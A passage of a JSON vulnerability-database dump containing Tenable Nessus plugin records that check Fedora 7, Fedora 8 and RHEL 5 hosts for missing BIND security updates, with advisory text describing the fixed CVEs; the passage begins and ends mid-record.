"CVE-2008-1447", "CVE-2007-6283"], "modified": "2008-07-10T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bind", "cpe:/o:fedoraproject:fedora:8"], "id": "FEDORA_2008-6281.NASL", "href": "https://www.tenable.com/plugins/nessus/33470", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-6281.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33470);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2007-6283\", \"CVE-2008-0122\", \"CVE-2008-1447\");\n script_xref(name:\"CERT\", value:\"800113\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n script_xref(name:\"FEDORA\", value:\"2008-6281\");\n\n script_name(english:\"Fedora 8 : bind-9.5.0-28.P1.fc8 (2008-6281)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"9.5.0-P1 release which contains fix for CVE-2008-1447. This update\nalso fixes parsing of inner ACLs.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=449345\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-July/012338.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e4c3b108\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(189, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/10\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 8.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC8\", reference:\"bind-9.5.0-28.P1.fc8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:06:18", "description": " - CVE-2008-0122, libbind.so off-by-one buffer overflow,\n very low severity\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2008-01-27T00:00:00", "title": "Fedora 8 : bind-9.5.0-23.b1.fc8 (2008-0903)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2007-6283"], "modified": "2008-01-27T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bind", "cpe:/o:fedoraproject:fedora:8", "p-cpe:/a:fedoraproject:fedora:bind-utils", "p-cpe:/a:fedoraproject:fedora:bind-sdb", "p-cpe:/a:fedoraproject:fedora:bind-debuginfo", "p-cpe:/a:fedoraproject:fedora:bind-libs", "p-cpe:/a:fedoraproject:fedora:bind-chroot", "p-cpe:/a:fedoraproject:fedora:bind-devel"], "id": "FEDORA_2008-0903.NASL", "href": "https://www.tenable.com/plugins/nessus/30080", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-0903.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(30080);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2007-6283\", \"CVE-2008-0122\");\n script_xref(name:\"FEDORA\", value:\"2008-0903\");\n\n script_name(english:\"Fedora 8 : bind-9.5.0-23.b1.fc8 (2008-0903)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - CVE-2008-0122, libbind.so off-by-one buffer overflow,\n very low severity\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-January/007134.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0af33562\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(189, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 8.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC8\", reference:\"bind-9.5.0-23.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-chroot-9.5.0-23.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-debuginfo-9.5.0-23.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-devel-9.5.0-23.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-libs-9.5.0-23.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-sdb-9.5.0-23.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-utils-9.5.0-23.b1.fc8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / bind-libs / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:06:18", "description": " - CVE-2008-0122, libbind.so off-by-one buffer overflow,\n very low severity\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2008-01-27T00:00:00", "title": "Fedora 7 : bind-9.4.2-3.fc7 (2008-0904)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2007-6283"], "modified": "2008-01-27T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:7", "p-cpe:/a:fedoraproject:fedora:bind", "p-cpe:/a:fedoraproject:fedora:caching-nameserver", "p-cpe:/a:fedoraproject:fedora:bind-utils", "p-cpe:/a:fedoraproject:fedora:bind-sdb", "p-cpe:/a:fedoraproject:fedora:bind-debuginfo", "p-cpe:/a:fedoraproject:fedora:bind-libs", "p-cpe:/a:fedoraproject:fedora:bind-chroot", "p-cpe:/a:fedoraproject:fedora:bind-devel"], "id": "FEDORA_2008-0904.NASL", "href": "https://www.tenable.com/plugins/nessus/30081", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-0904.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(30081);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2007-6283\", \"CVE-2008-0122\");\n script_xref(name:\"FEDORA\", value:\"2008-0904\");\n\n script_name(english:\"Fedora 7 : bind-9.4.2-3.fc7 (2008-0904)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - CVE-2008-0122, libbind.so off-by-one buffer overflow,\n very low severity\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=429149\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-January/007135.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1438dc61\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(189, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:caching-nameserver\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 7.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC7\", reference:\"bind-9.4.2-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-chroot-9.4.2-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-debuginfo-9.4.2-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-devel-9.4.2-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-libs-9.4.2-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-sdb-9.4.2-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-utils-9.4.2-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"caching-nameserver-9.4.2-3.fc7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / bind-libs / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:06:08", "description": "Updated bind packages that fix two security issues, several bugs, and\nadd enhancements are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nIt was discovered that the bind packages created the 'rndc.key' file\nwith insecure file permissions. This allowed any local user to read\nthe content of this file. A local user could use this flaw to control\nsome aspects of the named daemon by using the rndc utility, for\nexample, stopping the named daemon. This problem did not affect\nsystems with the bind-chroot package installed. (CVE-2007-6283)\n\nA buffer overflow flaw was discovered in the 'inet_network()'\nfunction, as implemented by libbind. An attacker could use this flaw\nto crash an application calling this function, with an argument\nprovided from an untrusted source. (CVE-2008-0122)\n\nAs well, these updated packages fix the following bugs :\n\n* when using an LDAP backend, missing function declarations caused\nsegmentation faults, due to stripped pointers on machines where\npointers are longer than integers.\n\n* starting named may have resulted in named crashing, due to a race\ncondition during D-BUS connection initialization. This has been\nresolved in these updated packages.\n\n* the named init script returned incorrect error codes, causing the\n'status' command to return an incorrect status. In these updated\npackages, the named init script is Linux Standard Base (LSB)\ncompliant.\n\n* in these updated packages, the 'rndc [command] [zone]' command,\nwhere [command] is an rndc command, and [zone] is the specified zone,\nwill find the [zone] if the zone is unique to all views.\n\n* the default named log rotation script did not work correctly when\nusing the bind-chroot package. In these updated packages, installing\nbind-chroot creates the symbolic link '/var/log/named.log', which\npoints to '/var/named/chroot/var/log/named.log', which resolves this\nissue.\n\n* a previous bind update incorrectly changed the permissions on the\n'/etc/openldap/schema/dnszone.schema' file to mode 640, instead of\nmode 644, which resulted in OpenLDAP not being able to start. In these\nupdated packages, the permissions are correctly set to mode 644.\n\n* the 'checkconfig' parameter was missing in the named usage report.\nFor example, running the 'service named' command did not return\n'checkconfig' in the list of available options.\n\n* due to a bug in the named init script not handling the rndc return\nvalue correctly, the 'service named stop' and 'service named restart'\ncommands failed on certain systems.\n\n* the bind-chroot spec file printed errors when running the '%pre' and\n'%post' sections. Errors such as the following occurred :\n\nLocating //etc/named.conf failed: [FAILED]\n\nThis has been resolved in these updated packages.\n\n* installing the bind-chroot package creates a '/dev/random' file in\nthe chroot environment; however, the '/dev/random' file had an\nincorrect SELinux label. Starting named resulted in an 'avc: denied {\ngetattr } for pid=[pid] comm='named' path='/dev/random'' error being\nlogged. The '/dev/random' file has the correct SELinux label in these\nupdated packages.\n\n* in certain situations, running the 'bind +trace' command resulted in\nrandom segmentation faults.\n\nAs well, these updated packages add the following enhancements :\n\n* support has been added for GSS-TSIG (RFC 3645).\n\n* the 'named.root' file has been updated to reflect the new address\nfor L.ROOT-SERVERS.NET.\n\n* updates BIND to the latest 9.3 maintenance release.\n\nAll users of bind are advised to upgrade to these updated packages,\nwhich resolve these issues and add these enhancements.", "edition": 28, "published": "2008-05-22T00:00:00", "title": "RHEL 5 : bind (RHSA-2008:0300)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2007-6283"], "modified": "2008-05-22T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:bind-chroot", "p-cpe:/a:redhat:enterprise_linux:bind-devel", "p-cpe:/a:redhat:enterprise_linux:caching-nameserver", "p-cpe:/a:redhat:enterprise_linux:bind-libbind-devel", "p-cpe:/a:redhat:enterprise_linux:bind-libs", "p-cpe:/a:redhat:enterprise_linux:bind-utils", "p-cpe:/a:redhat:enterprise_linux:bind", "p-cpe:/a:redhat:enterprise_linux:bind-sdb"], "id": "REDHAT-RHSA-2008-0300.NASL", "href": "https://www.tenable.com/plugins/nessus/32424", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0300. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(32424);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-6283\", \"CVE-2008-0122\");\n script_bugtraq_id(27283);\n script_xref(name:\"RHSA\", value:\"2008:0300\");\n\n script_name(english:\"RHEL 5 : bind (RHSA-2008:0300)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated bind packages that fix two security issues, several bugs, and\nadd enhancements are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nIt was discovered that the bind packages created the 'rndc.key' file\nwith insecure file permissions. This allowed any local user to read\nthe content of this file. A local user could use this flaw to control\nsome aspects of the named daemon by using the rndc utility, for\nexample, stopping the named daemon. This problem did not affect\nsystems with the bind-chroot package installed. (CVE-2007-6283)\n\nA buffer overflow flaw was discovered in the 'inet_network()'\nfunction, as implemented by libbind. An attacker could use this flaw\nto crash an application calling this function, with an argument\nprovided from an untrusted source. (CVE-2008-0122)\n\nAs well, these updated packages fix the following bugs :\n\n* when using an LDAP backend, missing function declarations caused\nsegmentation faults, due to stripped pointers on machines where\npointers are longer than integers.\n\n* starting named may have resulted in named crashing, due to a race\ncondition during D-BUS connection initialization. This has been\nresolved in these updated packages.\n\n* the named init script returned incorrect error codes, causing the\n'status' command to return an incorrect status. In these updated\npackages, the named init script is Linux Standard Base (LSB)\ncompliant.\n\n* in these updated packages, the 'rndc [command] [zone]' command,\nwhere [command] is an rndc command, and [zone] is the specified zone,\nwill find the [zone] if the zone is unique to all views.\n\n* the default named log rotation script did not work correctly when\nusing the bind-chroot package. In these updated packages, installing\nbind-chroot creates the symbolic link '/var/log/named.log', which\npoints to '/var/named/chroot/var/log/named.log', which resolves this\nissue.\n\n* a previous bind update incorrectly changed the permissions on the\n'/etc/openldap/schema/dnszone.schema' file to mode 640, instead of\nmode 644, which resulted in OpenLDAP not being able to start. In these\nupdated packages, the permissions are correctly set to mode 644.\n\n* the 'checkconfig' parameter was missing in the named usage report.\nFor example, running the 'service named' command did not return\n'checkconfig' in the list of available options.\n\n* due to a bug in the named init script not handling the rndc return\nvalue correctly, the 'service named stop' and 'service named restart'\ncommands failed on certain systems.\n\n* the bind-chroot spec file printed errors when running the '%pre' and\n'%post' sections. Errors such as the following occurred :\n\nLocating //etc/named.conf failed: [FAILED]\n\nThis has been resolved in these updated packages.\n\n* installing the bind-chroot package creates a '/dev/random' file in\nthe chroot environment; however, the '/dev/random' file had an\nincorrect SELinux label. Starting named resulted in an 'avc: denied {\ngetattr } for pid=[pid] comm='named' path='/dev/random'' error being\nlogged. The '/dev/random' file has the correct SELinux label in these\nupdated packages.\n\n* in certain situations, running the 'bind +trace' command resulted in\nrandom segmentation faults.\n\nAs well, these updated packages add the following enhancements :\n\n* support has been added for GSS-TSIG (RFC 3645).\n\n* the 'named.root' file has been updated to reflect the new address\nfor L.ROOT-SERVERS.NET.\n\n* updates BIND to the latest 9.3 maintenance release.\n\nAll users of bind are advised to upgrade to these updated packages,\nwhich resolve these issues and add these enhancements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-6283\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-0122\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:0300\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(189, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-libbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:caching-nameserver\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/12/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/05/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:0300\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind-chroot-9.3.4-6.P1.el5\")) flag++;\n if 